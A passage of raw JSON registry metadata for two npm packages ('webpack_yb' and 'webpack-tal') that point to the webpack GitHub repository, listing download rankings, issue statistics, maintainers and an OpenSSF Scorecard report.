/manifests"}]},"repo_metadata_updated_at":"2026-08-27T04:35:58.910Z","dependent_packages_count":0,"downloads":6,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":45.76322889354142,"dependent_repos_count":25.32799796580169,"dependent_packages_count":32.89382871786066,"stargazers_count":0.08461914990744265,"forks_count":0.5284985502991155,"average":20.919634655482064},"purl":"pkg:npm/webpack_yb","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/webpack_yb","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/webpack_yb","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/webpack_yb/dependencies","status":null,"funding_links":["https://opencollective.com/webpack"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-27T00:06:34.042Z","issues_count":10163,"pull_requests_count":9431,"avg_time_to_close_issue":10850741.648681419,"avg_time_to_close_pull_request":2776093.13365612,"issues_closed_count":9897,"pull_requests_closed_count":8881,"pull_request_authors_count":1444,"issue_authors_count":6684,"avg_comments_per_issue":5.83508806454787,"avg_comments_per_pull_request":3.1767575018555827,"merged_pull_requests_count":6017,"bot_issues_count":8,"bot_pull_requests_count":2912,"past_year_issues_count":79,"past_year_pull_requests_count":934,"past_year_avg_time_to_close_issue":883737.0535714285,"past_year_avg_time_to_close_pull_request":362218.7858117326,"past_year_issues_closed_count":56,"past_year_pull_requests_closed_count":733,"past_year_pull_request_authors_count":79,"past_year_issue_authors_count":61,"past_year_avg_comments_per_issue":3.481012658227848,"past_year_avg_comments_per_pull_request":4.836188436830835,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":140,"past_year_merged_pull_requests_count":579,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/issues","maintainers":[{"login":"sokra","count":1358,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sokra"},{"login":"alexander-akait","count":1075,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"vankop","count":196,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vankop"},{"login":"TheLarkInn","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheLarkInn"},{"login":"ooflorent","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ooflorent"},{"login":"hai-x","count":128,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":111,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"timse","count":100,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/timse"},{"login":"snitin315","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/snitin315"},{"login":"jhnns","count":78,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jhnns"},{"login":"xtuc","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xtuc"},{"login":"smelukov","count":52,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/smelukov"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"evenstensberg","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"chenxsan","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chenxsan"},{"login":"Legends","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Legends"},{"login":"Jessidhia","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Jessidhia"},{"login":"avivkeller","count":33,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"ScriptedAlchemy","count":30,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ScriptedAlchemy"},{"login":"jamesgeorge007","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jamesgeorge007"},{"login":"michael-ciniawsky","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/michael-ciniawsky"},{"login":"EugeneHlushko","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/EugeneHlushko"},{"login":"Connormiha","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Connormiha"},{"login":"hiroppy","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hiroppy"},{"login":"samccone","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/samccone"},{"login":"SpaceK33z","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/SpaceK33z"},{"login":"sendilkumarn","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sendilkumarn"},{"login":"mc-zone","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mc-zone"},{"login":"gajus","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gajus"},{"login":"ljqx","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljqx"},{"login":"byzyk","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/byzyk"},{"login":"gpoitch","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gpoitch"},{"login":"kentcdodds","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kentcdodds"},{"login":"nveenjain","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nveenjain"},{"login":"jbottigliero","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jbottigliero"},{"login":"JounQin","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/JounQin"},{"login":"edmorley","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edmorley"},{"login":"pierreneter","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pierreneter"},{"login":"elliottsj","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/elliottsj"},{"login":"montogeek","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/montogeek"},{"login":"burhanuday","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/burhanuday"},{"login":"Janpot","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Janpot"},{"login":"shama","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shama"},{"login":"ovflowd","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"},{"login":"billyjanitsch","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/billyjanitsch"},{"login":"keblodev","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/keblodev"},{"login":"matheus1lva","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/matheus1lva"},{"login":"ljcrapo","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljcrapo"},{"login":"rishabh3112","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rishabh3112"},{"login":"anikethsaha","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anikethsaha"},{"login":"joshwiens","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/joshwiens"},{"login":"jeremenichelli","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jeremenichelli"},{"login":"reergymerej","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/reergymerej"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"MrKou47","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/MrKou47"},{"login":"aboktor","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aboktor"},{"login":"mikegreiling","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mikegreiling"},{"login":"mattlewis92","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mattlewis92"},{"login":"eemeli","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/eemeli"},{"login":"pranshuchittora","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pranshuchittora"},{"login":"3ru","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/3ru"},{"login":"ryanclark","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ryanclark"},{"login":"sapegin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sapegin"},{"login":"loveky","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/loveky"},{"login":"edocipriano","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edocipriano"},{"login":"PatrickJS","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/PatrickJS"},{"login":"jevancc","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jevancc"},{"login":"chrisdothtml","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chrisdothtml"},{"login":"anshumanv","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anshumanv"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"}],"active_maintainers":[{"login":"alexander-akait","count":433,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"hai-x","count":87,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":53,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"avivkeller","count":33,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"evenstensberg","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"ovflowd","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack_yb/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack_yb/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack_yb/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack_yb/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack_yb/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack_yb/codemeta","maintainers":[{"uuid":"yapovich","login":"yapovich","name":null,"email":"popoann16@163.com","url":null,"packages_count":5,"html_url":"https://www.npmjs.com/~yapovich","role":null,"created_at":"2022-11-10T17:42:15.805Z","updated_at":"2022-11-10T17:42:15.805Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/yapovich/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5816876,"maintainers_count":1245095,"namespaces_count":426640,"keywords_count":889778,"github":"npm","metadata":{"funded_packages_count":192526,"rate_limit":2},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-09-02T05:02:10.244Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":2568664,"name":"webpack-tal","ecosystem":"npm","description":"Packs CommonJs/AMD modules for the browser. Allows to split your codebase into multiple bundles, which can be loaded on demand. Support loaders to preprocess files, i.e. json, jsx, es7, css, less, ... and your custom stuff.","homepage":"https://github.com/webpack/webpack","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/webpack/webpack","keywords_array":[],"namespace":null,"versions_count":1,"first_release_published_at":"2017-08-28T07:57:53.334Z","latest_release_published_at":"2017-08-28T07:57:53.334Z","latest_release_number":"3.4.1","last_synced_at":"2026-09-03T00:23:42.609Z","created_at":"2022-04-10T03:39:16.340Z","updated_at":"2026-09-03T00:23:42.610Z","registry_url":"https://www.npmjs.com/package/webpack-tal","install_command":"npm install webpack-tal","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"latest":"3.4.1"},"contentPolicy":null},"repo_metadata":{"id":2686067,"uuid":"3678731","full_name":"webpack/webpack","owner":"webpack","description":"A bundler for javascript and friends. Packs many modules into a few bundled assets. Code Splitting allows for loading parts of the application on demand. Through \"loaders\", modules can be CommonJs, AMD, ES6 modules, CSS, Images, JSON, Coffeescript, LESS, ... and your custom stuff.","archived":false,"fork":false,"pushed_at":"2026-08-29T15:08:44.000Z","size":97455,"stargazers_count":65964,"open_issues_count":135,"forks_count":9523,"subscribers_count":1466,"default_branch":"main","last_synced_at":"2026-08-29T15:15:16.900Z","etag":null,"topics":["amd","build-tool","commonjs","compiler","es2015","es6","esm","javascript","javascript-compiler","javascript-modules","loaders","module-bundler","plugins","web","web-performance","webpack"],"latest_commit_sha":null,"homepage":"https://webpack.js.org","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/webpack.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":"GOVERNANCE.md","roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":null,"dco":null,"cla":null,"disclosure":null},"funding":{"open_collective":"webpack"}},"created_at":"2012-03-10T10:08:14.000Z","updated_at":"2026-08-29T14:54:50.000Z","dependencies_parsed_at":"2026-08-29T15:24:21.824Z","dependency_job_id":null,"html_url":"https://github.com/webpack/webpack","commit_stats":{"total_commits":12493,"total_committers":934,"mean_commits":"13.375802997858672","dds":0.5586328343872569,"last_synced_commit":"89dfc9a5c575dc691e3ac6a965d39c854fca3986"},"previous_names":[],"tags_count":672,"template":false,"template_full_name":null,"purl":"pkg:github/webpack/webpack","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/sbom","scorecard":{"id":546233,"data":{"date":"2025-07-28","repo":{"name":"github.com/webpack/webpack","commit":"de79ee457eb921e6e1b186c90c65590789a013ca"},"scorecard":{"version":"v5.2.1-26-g4feedb85","commit":"4feedb857ab8d82158aa9774bf8054df41992180"},"score":6,"checks":[{"name":"Code-Review","score":5,"reason":"Found 12/24 approved changesets -- score normalized to 5","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#code-review"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#packaging"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 12 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:6","Info: topLevel 'contents' permission set to 'read': .github/workflows/examples.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:13","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#token-permissions"}},{"name":"Security-Policy","score":9,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Warn: One or no descriptive hints of disclosure, vulnerability, and/or timelines in security policy","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#cii-best-practices"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#branch-protection"}},{"name":"Binary-Artifacts","score":0,"reason":"binaries present in source code","details":["Warn: binary detected: examples/nodejs-addons/file.node:1","Warn: binary detected: examples/wasm-bindgen-esm/pkg/hi_wasm_bg.wasm:1","Warn: binary detected: examples/wasm-simple/add.wasm:1","Warn: binary detected: examples/wasm-simple/factorial.wasm:1","Warn: binary detected: examples/wasm-simple/fibonacci.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory2.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory3.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/other.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/wasm.wasm:1","Warn: binary detected: test/cases/wasm/imports-multiple/wasm.wasm:1","Warn: binary detected: test/cases/wasm/v128/v128.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/testFunction.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/configCases/wasm/externref/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/configCases/wasm/missing-wasm-experiment/wasm.wasm:1","Warn: binary detected: test/configCases/wasm/reference-types/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/0/wasm.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/1/wasm.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/examples.yml:29: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:72: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:77: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:85: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:96: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:98: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:109: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:111: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:118: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:124: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:162: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:163: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:174: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:200: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:207: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Info:   0 out of  22 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 28 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-20T09:35:41.151Z","repository_id":2686067,"created_at":"2025-08-20T09:35:41.151Z","updated_at":"2025-08-20T09:35:41.151Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36974490,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-08-29T02:00:05.978Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"webpack","name":"webpack","uuid":"2105791","kind":"organization","description":"","email":null,"website":"https://webpack.js.org","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/2105791?v=4","repositories_count":50,"last_synced_at":"2024-10-29T23:38:53.364Z","metadata":{"has_sponsors_listing":false,"funding":{"open_collective":"webpack"}},"html_url":"https://github.com/webpack","funding_links":["https://opencollective.com/webpack"],"total_stars":95072,"followers":924,"following":0,"created_at":"2022-11-02T16:19:08.894Z","updated_at":"2024-10-29T23:38:53.365Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack/repositories"},"tags":[{"name":"v5.110.1","sha":"0b2952e15bb1aa9a198acbbfdcb9a0dc1aabb5af","kind":